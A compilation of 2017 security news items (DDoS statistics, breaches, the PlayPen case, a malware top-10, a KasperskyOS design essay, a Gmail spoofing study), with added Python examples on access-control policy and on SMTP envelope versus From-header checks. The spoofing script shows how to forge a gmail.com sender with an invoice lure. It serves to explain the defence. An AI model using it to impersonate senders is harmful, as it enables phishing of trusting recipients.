71.6% of attacks targeted resources located in China, which was 9 p.p. more than the previous quarter. There was a small increase in the number of targets in South Korea (+0.7 p.p.). The US rounded off the top three, even though its share decreased by 9.7 p.p. (9% vs.18.7% in Q3).

The shares of the other countries in the Top 10 remained almost unchanged, with the exception of Japan which saw a fall of 1 p.p. Italy and the Netherlands left the rating and were replaced by Germany (0.56%) and Canada (0.77%).

Changes in DDoS attack numbers

The distribution of DDoS activity was relatively even throughout Q4, with the exception of a sharp peak registered on 5 November when the largest number of attacks in 2016 – 1,915 – was recorded. The quietest day of Q4 was 23 November (90 attacks). However, by 25 November cybercriminal activity had increased to 981 attacks.

Number of DDoS attacks over time* in Q4 2016

*DDoS attacks may last for several days. In this timeline, the same attack may be counted several times, i.e. one time for each day of its duration.

Saturday was the busiest day of the week in Q4 for DDoS attacks (18.2% of attacks), followed by Friday 1.7 p.p. behind. Monday became the quietest day of the week for DDoS attacks (11.6%).

Distribution of DDoS attack numbers by day of the week, Q3 and Q4 2016

Types and duration of DDoS attacks

The SYN DDoS method remained the most popular: its share accounted for 75.3% of attacks, although this figure is 5.7 p.p. less than in the previous quarter. The figures for other attack types increased slightly – TCP DDoS (from 8.2% to 10.7%) and ICMP DDoS (from 1.7% to 2.2%). UDP’s contribution remained almost unchanged.

Distribution of DDoS attacks by type, Q3 and Q4 2016

Distribution of DDoS attacks by duration (hours) in Q4 2016 was distinctly uneven. While the share of attacks that lasted no more than four hours remained almost the same as the previous quarter (it decreased by just 1.56 p.p.), the figures for the other time periods changed significantly.

The share of attacks that lasted 5-9 hours increased from 14.49% to 19.28%. Attacks lasting 10-19 hours fell by 1.3 p.p., while the proportion of attacks that lasted 20-49 hours fell by even more – minus 3.35 p.p. The percentage of even longer attacks decreased considerably – the share of attacks lasting 50–99 hours accounted for 0.94%, compared to 3.46% in the previous quarter. The share of attacks that lasted 100-150 hours grew and reached 2.2%, which meant that Q4 saw twice as many of these attacks than those lasting 50-99 hours. There were very few cases of attacks lasting longer than 150 hours.

The longest DDoS attack in the fourth quarter lasted for 292 hours, 8 hours longer than the Q3 maximum. This was also the longest attack of 2016.

Distribution of DDoS attacks by duration (hours), Q3 and Q4 2016

C&C servers and botnet types

In Q4, the highest number of C&C servers (59.06%) was detected in South Korea. Although the country’s contribution increased by 13.3 p.p. from the previous quarter, it is much less than in Q2 2016 (69.6%). The top three countries hosting the most C&C servers remained unchanged – South Korea, China (8.72%) and the US (8.39%). Their total share accounted for 76.1%, which is an increase of 8.4 p.p. compared to Q3.

In the fourth quarter, three Western European countries – the Netherlands (7.4%), the UK (1.3%), and France (1.7%) – remained in the Top 10 after entering it back in Q3. Among the newcomers to the C&C rating were Bulgaria (6%) and Japan (1.3%).

Distribution of botnet C&C servers by country in Q4 2016

When it came to the distribution of operating systems in Q4, Linux-based DDoS bots remained the clear leader, although their share decreased by 2.2 p.p., accounting for 76.7%. This correlates with the decline in popularity of SYN DDoS for which Linux bots are the most appropriate tool.

The growing popularity of IoT devices used for DDoS attacks suggests that in 2017 the balance will shift further towards Linux, since most Internet-connected devices are based on this operating system.

Correlation between attacks launched from Windows and Linux botnets, Q3 and Q4 2016

The majority of attacks – 99.7% – were carried out by bots belonging to a single family. Cybercriminals launched attacks using bots from two different families in just 0.3% of cases.

Conclusions and forecasts

We expect the share of amplification-type attacks in 2017 to continue to decrease, especially the most popular types (DNS, NTP). However, considering the simplicity and low organizational costs, the technique may be used in some less popular protocols suitable for amplification (RIP, SSDP, LDAP and so on), though it is unlikely that such attacks will be very effective.

The number and complexity of attacks on applications will continue to grow. Considering the renewed interest in this type of attack among cybercriminals and the stagnation in this segment over the last few years, we can assume that older botnets will gradually fall out of use and something new will appear, for example, botnets capable of more sophisticated attacks. The trend for encryption in attacks on applications will remain.

WordPress Pingback attacks will remain popular. Although in the newer versions of the WordPress CMS the vulnerability used for organizing such attacks (namely, the default Pingback function in older CMS versions) has long since been patched by the developers, there are still many vulnerable hosts on the Internet. Of course, their number will decline over time, reducing the number and power of WordPress Pingback attacks. But the relative simplicity and low cost of organizing such attacks, as well as the possibility of using encryption, makes WordPress Pingback-type attacks attractive to unpretentious cybercriminals.

Botnets based on IoT devices will continue to grow. This is largely due to both the novelty of the IoT concept in general and exploitation of IoT devices by cybercriminals. We can assume that in the fourth quarter of 2016 we only saw the emergence of this new market segment, and in 2017 it will continue to grow and develop. The potential growth is difficult to estimate: until now IoT-device manufacturers were not particularly concerned about protecting their products. Even if we assume that all new IoT devices entering the market are perfectly protected from malicious attacks (which in itself is quite doubtful), the current volume of vulnerable IoT devices with Internet access is considerable. Just a few months after the initial appearance of the concept, attackers were able to demonstrate the use of botnets of unprecedented size and conduct attacks whose power was previously only considered possible in theory. Moreover, these devices have the potential to launch attacks of any complexity – the current trend is attacks on applications, including the use of encryption. Considering the highly effective nature and huge potential of IoT-based attacks, we can predict an increase in the number of such attacks as well as their volume and complexity in 2017.


Sports Direct hacked but it still hasn’t disclosed the breach to its staff
12.2.2017

Sports Direct, the UK’s largest sports retail business, was hacked last year, and still hasn’t disclosed the incident to its staff.
The Register confirmed that Sports Direct, the UK’s largest sports retail business, was hacked last year and still hasn’t disclosed the incident to its staff.

In the autumn a hacker broke into the internal systems of the company and accessed personal information of its staffers, including names, email and postal addresses, as well as phone numbers.

The attackers exploited known vulnerabilities affecting the unpatched version of the DNN platform used by Sports Direct to host its staff portal.

According to an inside source with knowledge of the data breach, staff data were stored in plain text. Sports Direct discovered the security breach in September; the insider claimed the attacker left a contact number on the company’s internal website so that the business could get in touch.

According to El Reg, Sports Direct still has not disclosed the data breach to its staff, although the company filed an incident report with the Information Commissioner’s Office after it became aware of the intrusion.

“A spokesperson for the ICO confirmed to The Register that it was ‘aware of an incident from 2016 involving Sports Direct’ and would be ‘making enquiries.’” reported The Register.

“Sports Direct workers will be anxious to know what personal details have been hacked in this apparently serious data breach and why they weren’t immediately informed about it by their employer. This is potentially sensitive and personal information.” the Unite assistant general secretary Steve Turner told The Register.

“It’s completely unacceptable that the workers affected appear not to have been informed and the data breach swept under the carpet,”

“We will be immediately approaching the company for answers and further details about the potentially damaging impact of this on our members, as well as details about actions taken to ensure personal data is never compromised again,” the union’s assistant general secretary said. “In the meantime we would urge Sports Direct workers to check their financial records, change passwords and immediately report any suspicious activity.”

What was Sports Direct’s reply?

“We cannot comment on operational matters in relation to cyber-security for obvious reasons. However, it is our policy to continually upgrade and improve our systems, and where appropriate we keep the relevant authorities informed.” said a company spokesman.


Privacy groups claim FBI hacking operation in the PlayPen case was unconstitutional
11.2.2017 securityaffairs BigBrothers

According to privacy groups, the FBI search warrant used to hack into thousands of computers around the world in the PlayPen case was unconstitutional.
Privacy groups are claiming the FBI hacking campaign against the Playpen child pornography community violated international law.

According to the court documents, the FBI monitored a Tor hidden service bulletin board, named Playpen and launched in August 2014, that was mainly used for “the advertisement and distribution of child pornography.”

Within one year the Playpen hidden service reached over 200,000 users, with over 117,000 total posts mainly containing child pornography content. Law enforcement discovered nearly 1,300 IP addresses belonging to its visitors.

According to Motherboard, the server running Playpen was seized by the FBI from a web host in North Carolina; law enforcement then kept the server running in order to track its visitors. The agents used a network investigative technique (NIT) to obtain the IP addresses of the Playpen users.

The Feds hacked 8,700 computers in 120 countries, based on a single warrant, a procedure considered unconstitutional by privacy advocates. The US Law enforcement has expanded its extraterritorial surveillance capabilities without the consent of the states that were hosting the computers targeted by their malware.

“The FBI’s hacking operation in this case represents an enormous expansion of its extraterritorial surveillance capabilities — affecting thousands of computers in over a hundred countries around the world.” wrote Scarlet Kim, a legal officer with U.K.-based Privacy International. “How will other countries react to the FBI hacking in their jurisdictions without prior consent?”

What if a foreign intelligence agency or law enforcement body had carried out a similar hacking operation that compromised the computers of US citizens?

Last week, the U.K.-based Privacy International group, the Electronic Frontier Foundation (EFF) and the American Civil Liberties Union of Massachusetts, filed briefs in a lawsuit involving the FBI’s Playpen investigation.

The privacy groups filed briefs in a case involving Alex Levin, who is one of the suspects in the FBI’s Playpen investigation that was identified by the Feds thanks to the NIT (Network investigative technique).

The privacy advocates claim that the single warrant used by the FBI to conduct the hacking operations is not valid.

According to the EFF and ACLU groups, the warrant was invalid because the U.S. Constitution prohibits such kind of search on US citizens.

“No one questions the need for the FBI to investigate serious crimes like child pornography. But even serious crimes can’t justify throwing out our basic constitutional principles. Here, on the basis of a single warrant, the FBI searched 8,000 computers located all over the world,” EFF attorney Mark Rumold wrote in a blog post. “If the FBI tried to get a single warrant to search 8,000 houses, such a request would unquestionably be denied.”

The EFF considers the use of a single warrant to hack such a huge number of computers across the world unconstitutional.

On the other side, U.S. attorneys believe the Feds followed proper procedures in obtaining the warrant, and that there was no other way to uncloak the criminals involved in the PlayPen case.


Kelihos becomes January’s Top 10 ‘Most Wanted’ Malware
11.2.2017 securityaffairs Virus

The infamous Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.
Which are the most active malware in the wild?

According to research conducted by CheckPoint Security, the malware landscape was characterized by some interesting changes in this first part of 2017.

The Kelihos botnet climbed to the top position, while the Conficker worm dropped to fourth on the chart of malware.

Surprisingly, the eight-year-old Conficker malware continued to be one of the most active malware families in 2016.

In June 2016, researchers at CheckPoint described Conficker as “the most prominent family accounting for 14 percent of recognized attacks.” Recall the Conficker resurgence in 2015, when samples of the malware infected police body cameras.

Below is January’s Top 10 ‘Most Wanted’ Malware list published by CheckPoint Security:

Kelihos – Botnet mainly involved in bitcoin theft and spamming. It utilizes peer-to-peer communications, enabling each individual node to act as a Command & Control server
HackerDefender – User-mode Rootkit for Windows, can be used to hide files, processes and registry keys, and also implements a backdoor and port redirector that operates through TCP ports opened by existing services. This means it is not possible to find the hidden backdoor through traditional means.
Cryptowall – Ransomware that started as a Cryptolocker doppelgänger, but eventually surpassed it. After the takedown of Cryptolocker, Cryptowall became one of the most prominent ransomwares to date. Cryptowall is known for its use of AES encryption and for conducting its C&C communications over the Tor anonymous network. It is widely distributed via exploit kits, malvertising and phishing campaigns.
Conficker – Worm that allows remote operations and malware download. The infected machine is controlled by a botnet, which contacts its Command & Control server to receive instructions.
Nemucod – JavaScript or VBScript downloader which is commonly used to download ransomware variants or other malicious payloads.
RookieUA – Info Stealer designed to extract user account information such as logins and passwords and send them to a remote server.
Nivdort – Multipurpose bot, also known as Bayrob, that is used to collect passwords, modify system settings and download additional malware. It is usually spread via spam emails with the recipient address encoded in the binary, thus making each file unique.
Zeus – Banking Trojan that uses man-in-the-browser keystroke logging and form grabbing in order to steal banking information.
Ramnit – Banking Trojan that steals banking credentials, FTP passwords, session cookies and personal data.
Necurs – Botnet used to spread malware by spam emails, mainly Ransomware and Banking Trojans.
Recently the Kelihos malware was observed spreading via infected thumb drives. The third Most Wanted malware in January was CryptoWall, a well-known ransomware, the remaining positions in the Top 10 list are occupied by other botnets mainly involved in the distribution of the dreaded Locky ransomware.

Checkpoint also observed changes in the mobile threat landscape: the Android Triada modular backdoor remains the most advanced mobile malware in the Top 3 Most Wanted mobile threats. In second place is HummingBad; CERT-EU and other sources corroborated Check Point researchers’ findings that a new variant of the lucrative ad-fraud malware HummingBad is spreading rapidly on the Android marketplace Google Play.

HummingBad was first seen almost a year ago, in January/February 2016, and is attributed to the malware authors Yingmob; it raked in approximately $300,000 USD per month for the better part of 2016. Approximately 10 million Android devices were infected in the first part of last year.

Now a new variant, dubbed “HummingWhale” by Check Point, is at large with better ad-fraud capabilities and more sophisticated techniques than HummingBad. It was bundled into several applications that, taken together, have been downloaded several million times.

The third mobile malware threat is Hiddad, a strain of Android malware that repackages legitimate apps and then releases them to a third-party store.

Below the Top 3 ‘Most Wanted’ mobile malware:

Triada – Modular backdoor for Android which grants super-user privileges to downloaded malware, which helps it get embedded into system processes. Triada has also been seen spoofing URLs loaded in the browser.
Hummingbad – Android malware that establishes a persistent rootkit on the device, installs fraudulent applications, and with slight modifications could enable additional malicious activity such as installing a key-logger, stealing credentials and bypassing encrypted email containers used by enterprises.
Hiddad – Android malware which repackages legitimate apps and then releases them to a third-party store. Its main function is displaying ads, but it is also able to gain access to key security details built into the OS, allowing an attacker to obtain sensitive user data.


Features of secure OS realization
11.2.2017 Kaspersky OS

There are generally accepted principles that developers of all secure operating systems strive to apply, but there can be completely different approaches to implementing these principles. A secure operating system can be developed from an existing OS by improving certain characteristics that are the cause (or the consequence) of that operating system’s insecure behavior, or it can be developed from scratch. The former approach has the clear advantage of lower development costs and compatibility with a broad range of software.

Let’s consider this approach in the context of systems that are part of the critical infrastructure. Two factors are important for such systems:

The ability to fulfil special security requirements, which may involve not only preserving certain general properties of information (such as confidentiality), but such things as tracking certain commands and data flows, having no impact on process execution in the system, etc.

The provision of guarantees that the system will work securely and will not be compromised.

Building a secure system based on a popular OS commonly involves implementing additional mechanisms of access control (e.g., based on the mandatory access control model), strengthened authentication, data encryption, security event auditing, and application execution control. As a rule, these are standard security measures, with the system’s special requirements addressed at the application level. As a result, special (and often also general) security measures rely on the implementation of numerous components, each of which can be compromised. Examples include: SELinux, RSBAC, AppArmor, TrustedBSD, МСВС, and Astra Linux, etc.

To improve security, tools that make it more difficult to exploit some vulnerabilities, including those inherent in the system due to its insecure original design, can be built into the system. Examples include: Grsecurity, AppArmor, Hardened Gentoo, Atlix, YANUX, and Astra Linux, etc.

Only a few years ago, a commonly used approach was to provide “security” guarantees based on scanning software code for errors and vulnerabilities and checking software integrity by comparing checksums. That approach was used in Openwall Linux, and some operating systems developed in Russia.

Although these measures lead to an overall improvement in the characteristics of general-purpose systems, they cannot address the special requirements for systems that are part of the critical infrastructure or guarantee security with a high degree of confidence.

Unlike initiatives based on attempts to improve the security of existing operating systems, KasperskyOS was, from the start, designed around architectural principles that can ensure secure behavior meeting the requirements of special-purpose systems.

However, operating systems originally designed as secure cannot always guarantee that specific security policies will be enforced. Objective reasons for this include the difficulty of specifying clear security goals for such a relatively versatile IT product as an operating system, as well as the large number and variety of threats posed by the environment.

If an operating system is designed for specific uses on a more or less fixed range of hardware, with specific software running under it within defined operating scenarios, then security goals can be defined with sufficient accuracy and a threat model can be built. To achieve security goals, the model is used to develop a specific list of security requirements and trust requirements. Fulfilling these requirements is sufficient to guarantee the system’s secure behavior. Examples include specialized embedded solutions from LynuxWorks, Wind River, and Green Hills.

For a general-purpose operating system, achieving the same guarantees is more difficult due to a broader definition of security goals (which is necessary for the system to support a broader range of secure execution scenarios). As a rule, this requires support for a whole class of policies that are needed for a specific access control type (discretionary, mandatory, role-based), customary authentication mechanisms, and other protection tools whose management does not require specialist knowledge. This requires implementing relatively universal security mechanisms. Sometimes, provided that the OS runs on a fixed hardware platform (usually from the same vendor), compliance of these mechanisms with a certain standard or security profile can be guaranteed with a sufficient degree of confidence. Examples include Oracle Solaris with Trusted Extensions, XTS-400, OpenVMS and AS/400.

Finally, for a general-purpose operating system that runs on an arbitrary hardware platform, achieving high security guarantees is even harder because in this case the threat model grows out of all proportion.

This problem can be solved using an approach based on building a modular system from trusted components which are small and which implement standardized interfaces. The architecture of a secure system built in this way makes it possible to port a relatively small amount of software code to various hardware platforms and verify it, while keeping top-level modules so that they can be reused. Potentially, this makes it possible to provide security guarantees for each specific use of the OS.

The development model of the KasperskyOS operating system is based on implementing small trusted low-level components which enable top-level components to be reused. This provides maximum flexibility and efficiency in tailoring the system for the specific needs of a particular deployment, while maintaining the verifiability of its security properties.

The first step towards creating a modular operating system is using a microkernel-based architecture. All interaction and data exchange between components passes through the microkernel, which therefore mediates every access in the system.

However, the access control provided by the microkernel alone cannot implement system properties that depend on specific security policies. KasperskyOS therefore separates access decisions, which are computed from the defined policy, from the enforcement of those decisions, which is implemented at the microkernel level. Access decisions, i.e. verdicts on security policy compliance, are computed by a dedicated component – the security server. Flask is the best known architecture based on this principle.

It should be noted that a number of enhanced-security operating systems (SELinux, SEBSD) based on general-purpose systems have been built using the Flask architecture, but these systems use a large monolithic kernel. In fact, Flask does not require using a microkernel, but it works best with one.

KasperskyOS does not reproduce the Flask architecture in full but develops its ideas to provide better security and flexibility of use in target systems. The original Flask architecture describes interfaces and requirements for the two main components involved in applying security policies to interaction – a security server, which computes security verdicts, and an object manager, which provides access based on these verdicts. The development of KasperskyOS is, to a large extent, focused on preserving trust not only for mechanisms that compute and apply verdicts, but also for the configuration based on which this computation is performed. Basic security policies are combined into more sophisticated rules using a configuration language. These rules are then compiled into a component that acts as an intermediary between the security server and the microkernel, enabling verdicts to be computed in a way that provides the required business logic.

The major architectural difference between KasperskyOS and other secure operating systems available in the market is that the former implements security policies for each specific deployment of the OS. Support for those policies which are not needed is simply not included in the system. As a result, in each deployment of the operating system the security subsystem provides only required functionality, excluding everything that is not needed.

As a result, KasperskyOS provides configuration of overall security policy parameters (system-wide configuration at the security server level) and rules for applying policies to each operation performed by each entity in the system (through configuration of verdict computation).

The trusted code obtained by compiling configurations connects application software with the security model in the system, specifying which operations performed by programs should be governed by which security policies. Importantly, the code does not include any information about operations or policies except references to them.
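The Flask-style separation described above (a security server that only computes verdicts, object managers that only enforce them, and a compiled configuration that merely references policies and operations) is easiest to see in code. The following is an added example, not KasperskyOS or Flask code: the basic policies, the configuration format, the subject/object contexts and the object classes are invented for illustration, and KasperskyOS’s real configuration language is not shown.

```python
"""Flask-style separation of decision from enforcement, simulated in Python.

Added example, not KasperskyOS or Flask code. Policy names, the configuration
format and the sample contexts below are hypothetical.
"""
from enum import Enum
from typing import Callable, Dict, List, Set, Tuple


class Verdict(Enum):
    ALLOW = "allow"
    DENY = "deny"


Ctx = Dict[str, object]            # security context of a subject or object
Policy = Callable[[Ctx, Ctx], bool]
Operation = Tuple[str, str]        # (object class, method), e.g. ("file", "read")


# --- Basic security policies: the security model, independent of any deployment.
def no_read_up(subject: Ctx, obj: Ctx) -> bool:
    """Bell-LaPadula simple security: read only at or below the subject's level."""
    return subject["level"] >= obj["level"]


def no_write_down(subject: Ctx, obj: Ctx) -> bool:
    """Bell-LaPadula *-property: write only at or above the subject's level."""
    return subject["level"] <= obj["level"]


def type_enforcement(allowed: Set[Tuple[str, str]]) -> Policy:
    """Allow only the (subject type, object type) pairs in the whitelist."""
    return lambda subject, obj: (subject["type"], obj["type"]) in allowed


BASIC_POLICIES: Dict[str, Policy] = {
    "no_read_up": no_read_up,
    "no_write_down": no_write_down,
    "te_file": type_enforcement({("app", "user_file"), ("app", "secret_file")}),
    "te_net": type_enforcement({("netd", "socket")}),
}

# --- Deployment configuration (hypothetical format): which policies govern
# which operation. Policies not referenced here never reach this deployment.
CONFIG: Dict[Operation, List[str]] = {
    ("file", "read"): ["no_read_up", "te_file"],
    ("file", "write"): ["no_write_down", "te_file"],
    ("net", "send"): ["te_net"],
}


def compile_config(config, policies) -> Callable[[Operation, Ctx, Ctx], Verdict]:
    """Compile the configuration into the intermediary that computes verdicts.

    The compiled table holds only references to policies and operations; the
    policy logic itself stays in BASIC_POLICIES. Operations missing from the
    configuration are denied by default.
    """
    table = {op: [policies[name] for name in names] for op, names in config.items()}

    def verdict(op: Operation, subject: Ctx, obj: Ctx) -> Verdict:
        checks = table.get(op)
        if checks is None:
            return Verdict.DENY
        return Verdict.ALLOW if all(c(subject, obj) for c in checks) else Verdict.DENY

    return verdict


class SecurityServer:
    """Computes verdicts only; it never touches the objects themselves."""

    def __init__(self, compiled):
        self._compiled = compiled

    def compute(self, op: Operation, subject: Ctx, obj: Ctx) -> Verdict:
        return self._compiled(op, subject, obj)


class ObjectManager:
    """Owns one object class and enforces verdicts. It never interprets policy:
    every request is forwarded to the security server and the verdict is logged."""

    def __init__(self, object_class: str, server: SecurityServer):
        self.object_class = object_class
        self.server = server
        self.audit: List[Tuple[Operation, Verdict]] = []

    def request(self, subject: Ctx, obj: Ctx, method: str) -> bool:
        op = (self.object_class, method)
        v = self.server.compute(op, subject, obj)
        self.audit.append((op, v))
        return v is Verdict.ALLOW


# --- Wiring for one deployment, with constructed sample contexts.
SERVER = SecurityServer(compile_config(CONFIG, BASIC_POLICIES))
FILES = ObjectManager("file", SERVER)
NET = ObjectManager("net", SERVER)

APP = {"type": "app", "level": 2}
NETD = {"type": "netd", "level": 2}
USER_FILE = {"type": "user_file", "level": 1}
SECRET_FILE = {"type": "secret_file", "level": 3}
SOCKET = {"type": "socket", "level": 2}

if __name__ == "__main__":
    print("app reads user file:", FILES.request(APP, USER_FILE, "read"))        # True
    print("app reads secret file:", FILES.request(APP, SECRET_FILE, "read"))    # False
    print("app writes secret file:", FILES.request(APP, SECRET_FILE, "write"))  # True
    print("app sends on socket:", NET.request(APP, SOCKET, "send"))            # False
    print("app deletes user file:", FILES.request(APP, USER_FILE, "delete"))   # False
```

The point to notice is where knowledge lives: the object managers know nothing about levels or types, the security server knows nothing about files or sockets, and the compiled table knows only which named policy applies to which named operation. Compromising the configuration therefore cannot invent a new policy, and an operation nobody configured is denied rather than silently allowed.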

The architecture of KasperskyOS supports flexibility, applying policies to individual operations performed by different types of processes (without potentially jeopardizing security through possible compromise of the configuration).

Of course, a microkernel-based system with a Flask-like architecture is not a unique idea invented by KasperskyOS developers. There is a history of successful microkernel development (seL4, PikeOS, Feniks/Febos), including microkernels with formally verified security properties. This work can be used to implement an OS that guarantees security domain isolation (“security through isolation”) – an architecture known as MILS (Multiple Independent Levels of Security/Safety).

However, this case involves developing not just a microkernel but a fully-functional operating system that provides not only the separation of security domains and isolation of incompatible information processing environments, but also control of security policy compliance within these domains. Importantly, the microkernel, the infrastructure of the OS based on it and the security policies are developed by the same vendor. Using third-party work, even if it is of high quality, always imposes limitations.

KasperskyOS is based on a microkernel developed in-house, because this provides the greatest freedom in implementing the required security architecture.

The greatest shortcoming of operating systems built from scratch is the lack of support for existing software. In part, this shortcoming can be compensated for by maintaining compatibility with popular programming interfaces, the best known of which is POSIX.

This shortcoming is also successfully remedied by using virtualization. A secure operating system in whose environment a hypervisor for virtualizing a general-purpose system can be launched will be able to execute software for that OS. KasperskyOS, together with Kaspersky Secure Hypervisor, provides this capability. Provided that certain conditions are met, an insecure general-purpose OS can inherit the security properties of the host OS.

KasperskyOS is built with modern trends in the development and use of operating systems in mind, in order to implement efficient, practical and secure solutions.

To summarize, the KasperskyOS secure operating system is not an extension or improvement of existing operating systems, but this does not narrow the range of its applications. The system can be used as a foundation for developing solutions that have special security requirements. Capabilities related to providing flexible and effective application execution control are inherent in the architecture of KasperskyOS. The system’s development is based on security product implementation best practices and supported by scientific and practical research.


Gmail Delivers Spoofed Messages Without Warning, Researchers Find

11.2.2017 securityweek Security
Spoofed emails can easily land in users’ Gmail inboxes without any warning of suspicious activity, security researchers have discovered.

While spam is normally used to deliver malicious documents or links to unsuspecting users, spoofed emails have a bigger chance of luring potential victims, because they are likely to click on a link or open a document coming from what they believe is a trusted contact. When it comes to spoofed messages, the sender is impersonated or changed to another, thus making messages appear legitimate.

While users may expect Gmail to warn them of such suspicious activity, researchers at Morphus Segurança da Informação recently discovered that this doesn’t always happen. According to them, users should revise the trust they place in Gmail’s blocking of messages with spoofed senders, even when no alert is displayed regarding the legitimacy of a message.

“We realized that a message that appears in your Gmail inbox folder even with an important sign, coming from one of your Gmail contacts with no spoof or security alert, may have been forged and impersonated by a fraudster or cybercriminal,” Renato Marinho, Director at Morphus Segurança da Informação, explains.

Marinho explains that the Simple Mail Transfer Protocol (SMTP) defines the “mail envelope and its parameters, such as the message sender and recipient,” and not the message content and headers. Thus, an SMTP transaction includes MAIL FROM (which establishes the return address in case of failure), RCPT TO (the recipient address), and DATA (a command telling the SMTP server to receive the content of the message).

The value “From” displayed in the email is usually equivalent to the value used in the SMTP command “mail from” but, because it is part of the message content, “can be freely specified by the system or person issuing commands to the SMTP server.” Basically, an attacker simply needs to change the “From” to a desired value to spoof the sender, but that is almost certainly going to trigger anti-spam or anti-phishing mechanisms, Marinho explains.

However, attackers could also attempt to send spoofed messages on behalf of a certain domain by changing the “Mail from:” SMTP command as well, a practice that can be combated by applying spoofing protection mechanisms. Among them, SPF (Sender Policy Framework) allows admins to specify the IP addresses of the mail servers that are allowed to send e-mail messages on behalf of their domain.

To verify whether these protections are effective, the security researchers decided to test the spoofing of Gmail and Yahoo addresses. They discovered that, when the sending server’s IP address was not authorized by the SPF policy of their generic domain, the message was not delivered. Once an SPF policy authorizing that server was in place, however, Gmail delivered the spoofed message, while Yahoo continued to block it. In other words, SPF was evaluated against the envelope sender’s domain, which the researchers controlled, and not against the @gmail.com address shown in the From header.

Even more surprising, the researcher says, was that the message landed in the Inbox folder, and not in Spam. Further, there was almost no indication that the message wasn’t legitimate, except for a “via [the generic domain]” mention near the sender’s address. This mention, however, appears only in the web interface, but isn’t displayed in the Android or iOS applications.
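The distinction the researchers exploit, between the SMTP envelope (MAIL FROM) that SPF validates and the From header that the user sees, and the alignment check that closes the gap, can be shown with a short script. This is an added example, not code from the original article or from Morphus: the domains, addresses and message are constructed, the SPF result is passed in rather than computed from DNS, and the organizational-domain rule is a simplification of DMARC’s relaxed SPF alignment.

```python
"""Envelope sender vs. header From, and why an SPF pass alone is not enough.

Added example, not from the original article or from Morphus. Domains,
addresses and the message are constructed; the SPF result is assumed to have
been computed already by the receiving MTA.
"""
from email import message_from_string
from email.utils import parseaddr
from typing import List


def domain_of(address: str) -> str:
    """Domain part of an e-mail address, lower-cased and without a trailing dot."""
    return address.rsplit("@", 1)[-1].lower().rstrip(".")


def registered_domain(domain: str) -> str:
    """Organizational domain used for alignment.

    Assumption: the last two labels. Real DMARC uses the Public Suffix List so
    that names such as example.co.uk are handled correctly.
    """
    return ".".join(domain.split(".")[-2:])


def smtp_transaction(envelope_from: str, rcpt_to: str, raw_message: str) -> List[str]:
    """Client-side lines of one SMTP transaction.

    MAIL FROM and RCPT TO form the envelope. The message, including the From
    header that mail clients display, is sent only after DATA and is not
    checked against the envelope by the transport itself.
    """
    return [
        "EHLO mail.generic-domain.example",
        f"MAIL FROM:<{envelope_from}>",
        f"RCPT TO:<{rcpt_to}>",
        "DATA",
        *raw_message.splitlines(),
        ".",
    ]


def evaluate(envelope_from: str, raw_message: str, spf_result: str) -> str:
    """Combine the SPF result for the envelope domain with an alignment check
    against the header From, which is what DMARC adds on top of plain SPF.

    spf_result is the verdict ("pass", "fail", ...) the receiving MTA computed
    for the envelope domain against the connecting IP address.
    """
    msg = message_from_string(raw_message)
    _, header_from = parseaddr(msg.get("From", ""))
    env_dom = domain_of(envelope_from)
    hdr_dom = domain_of(header_from)
    if spf_result != "pass":
        return f"reject: SPF {spf_result} for envelope domain {env_dom}"
    if registered_domain(env_dom) != registered_domain(hdr_dom):
        # SPF authenticated the attacker's domain, not the one the user sees;
        # this is the case Gmail showed only as "via generic-domain.example".
        return f"unaligned: SPF pass for {env_dom}, header From is {hdr_dom}"
    return f"aligned: SPF pass for {env_dom} matches header From"


# Constructed spoofed message: the displayed From claims gmail.com, while the
# envelope sender belongs to a domain the attacker controls and has SPF for.
SPOOFED_ENVELOPE = "bounce@generic-domain.example"
SPOOFED_MESSAGE = (
    "From: Alice <alice@gmail.com>\n"
    "To: bob@gmail.com\n"
    "Subject: Quick favour\n"
    "\n"
    "Please open the attached invoice.\n"
)
LEGIT_ENVELOPE = "alice@gmail.com"

if __name__ == "__main__":
    for line in smtp_transaction(SPOOFED_ENVELOPE, "bob@gmail.com", SPOOFED_MESSAGE):
        print("C:", line)
    print(evaluate(SPOOFED_ENVELOPE, SPOOFED_MESSAGE, "pass"))   # unaligned
    print(evaluate(LEGIT_ENVELOPE, SPOOFED_MESSAGE, "pass"))     # aligned
    print(evaluate(SPOOFED_ENVELOPE, SPOOFED_MESSAGE, "fail"))   # reject
```

Read together with the article: the researchers’ message reached the inbox because the receiver stopped at the first branch (SPF pass). The second branch is the alignment check a DMARC policy on the header-From domain asks the receiver to apply; without it, an SPF pass proves only that the attacker’s own domain authorized the sending server.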

After successfully spoofing messages between @gmail.com accounts, the researchers applied the same strategy to corporate domains hosted by Google. They discovered not only that the messages were delivered without a warning, but that the spoofed account’s profile picture was also shown (which could easily add a sense of legitimacy to the message).

“During our experiments, we’ve found a curious scenario in which Gmail detects the spoofed message. It happened when we tried to spoof an address that apparently does not exist in the Gmail user base. In this situation, unlike the successful scenarios, Gmail forwarded the message to the Spam folder and added a special security alert informing that they could not verify if the message was really sent by gmail.com,” the researcher explains.

To stay protected, users are advised to pay attention to messages in their inbox coming from “@gmail.com” via another server, because such messages should normally be delivered by Gmail itself. They should also look at the message details, which are available in the web application by clicking the “down-arrow” near “to me”. A spoofed message is most likely to be noticed, however, when the full header is examined.

The researchers contacted Google Security team to report the findings, but the bug won’t be tracked as a security issue, it seems. “Although it has not been considered a security bug, in our opinion, it would be better if Gmail could at least adopt the same behavior we saw when trying to spoof a non-existing Gmail account,” Marinho says.


Russia suspected over cyber espionage campaign on the Italian foreign ministry
11.2.2017 securityaffairs Cyber
Italian officials speculate Russia was behind a cyber espionage campaign on the Italian foreign ministry that lasted for months.
The Italian Foreign Ministry was the victim of a targeted cyber espionage campaign, according to The Guardian newspaper, which cited a diplomatic source speaking on condition of anonymity.

According to the source, the attack was launched by a nation-state actor, likely Russia.

“Russia is suspected by Italian officials of being behind a sustained hacking attack against the Italian foreign ministry last year that compromised email communications and lasted for many months before it was detected, according to people familiar with the matter.” reported The Guardian.

The source revealed that after the experts discovered the attack, the foreign ministry introduced further security measures to improve its online “architecture” and its internal security. At the time of writing there is no technical information about the attack, nor about how the experts discovered the intrusion.

The hackers targeted the foreign ministry’s “field offices”, including embassies and staff members, they used a malware to spy on their systems and exfiltrate sensitive information.

“The official did not confirm that Moscow was behind the attack. But two other people with knowledge of the attack said the Russian state was believed to have been behind it. The hacking is now the subject of an inquiry by the chief prosecutor in Rome.” continued The Guardian.

